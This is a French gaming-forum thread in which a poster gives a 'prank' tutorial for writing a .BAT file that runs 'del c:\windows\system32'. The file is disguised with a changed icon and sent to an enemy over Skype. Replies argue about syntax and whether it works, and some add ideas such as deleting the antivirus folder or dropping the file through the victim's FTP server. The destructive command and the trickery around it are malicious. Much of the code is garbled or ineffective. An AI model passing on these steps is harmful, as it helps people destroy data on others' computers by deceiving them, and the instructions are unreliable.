Comment faire supprimer les fichier Windows a quelqun a distance

Statut
N'est pas ouverte pour d'autres réponses.

WiZz-

Premium
Réactions
231
RGCoins
25
HELLLLO tout le monde, je vous retrouve pour une blague tres mechant a faire a vos pire enemie

ATTENTION: Moi meme et Reality Gaming somme pas responsable de cette "blague",si vous suiver ce tuto vous etes totalement responsable a vos risque et péril

Le but et de créé une commande qui va permette de supprimer le systeme32 d'un ordinateur(c'est un peu la base du hacking)

Etape 1 :Ouvrir un bloc note

Etape 2 : entre ceci
echo off:
del c:\windows\system32

Etape 3 : Faire fichier,enrengistré sous, nomélecommevousvoulé.BAT
(NE pas oublier le .BAT)

Etape 4 :Faire en sorte pour changer l'icon du fichier .:rechercher: sur google

Voila envoyer le sur Skype ou une autre plateforme BYYYEE

Merci n'oublie pas le j'aime sa fait toujours plaisir

j'ai pas compris faut faire ??

Bas si tu veux detruire ton PC un conseille non mais bon

Il faut ecrire que de del a windows ?

?? je cromprend pas

Sur le bloc note , il faut écrire echo off:
del:\vindows\system32
ou juste : del:\windows\system32 ?

non sa @echo off:
del c:\windows\system32

Les kéké qui connaisse rien au pc :s le jours ou tu arrivera à détruire le système 32 du pc d'une autre personne alors que son système est lancé, je t'appelerais dieu :p c'est comme vouloir formaté un pc en faisant executé--->cmd---->FORMAT :c tu y arriveras jamais ^^

Tu parle a moi la ?

C'est marrant sa déjà tu devrais garder sa pour toi et ne pas poster de sujet là dessus et pour qu'il est ton .bat sur son ordi faut que tu accède à son serveur ftp et que tu le mette dedans et tu le lances a distance depuis ton pc sinon la personne ne voudra jamais recevoir ton .bat --' quand on poste unsujet on fait pas que la moitié

Les kéké qui connaisse rien au pc :s le jours ou tu arrivera à détruire le système 32 du pc d'une autre personne alors que son système est lancé, je t'appelerais dieu :p c'est comme vouloir formaté un pc en faisant executé--->cmd---->FORMAT :c tu y arriveras jamais ^^
Je suis totalement d'accord avec toi. C'est pas aussi simple ... Il existe belle et bien un code pour supprimer le system32 mais il faut au moin 50 ligne, pas 2.

Je suis totalement d'accord avec toi. C'est pas aussi simple ... Il existe belle et bien un code pour supprimer le system32 mais il faut au moin 50 ligne, pas 2.
Bas tu vois c'est deux lignes marche ^^
Si ya 50 lignes,c'est pour desactivé l'anti-virus pour pas qui le signal mais sa il faut rajouté aussi
del c:/programe file/le nom de l'anti virus

C'est pas parce que ta hacké Fr gaming et impact gaming que tes un dieux

Bas tu vois c'est deux lignes marche ^^
Si ya 50 lignes,c'est pour desactivé l'anti-virus pour pas qui le signal mais sa il faut rajouté aussi
del c:/programe file/le nom de l'anti virus

C'est pas parce que ta hacké Fr gaming et impact gaming que tes un dieux
Je vien tester sous VirtualMachine et sa ne marche pas ...

Mdr c'est TRES TRES méchant =D

Bas en tout cas chez moi sa marche (j'ai tésté avec un vieux PC sans anti-virus) est sa a marché peut êtres que sa marche pas sous Virtual Machine mais bon ,je veux juste aidé certaine personne

Bas en tout cas chez moi sa marche (j'ai tésté avec un vieux PC sans anti-virus) est sa a marché peut êtres que sa marche pas sous Virtual Machine mais bon ,je veux juste aidé certaine personne
Si c'est un XP oui, mais si c'est Win7 ou Vista sa ne marche pas.

Oui c'est sur xp je croit , c'était un vieux pc que j'avais eu en 2005, mais sa c'est la base du hack si ta lu

Statut
N'est pas ouverte pour d'autres réponses.
Retour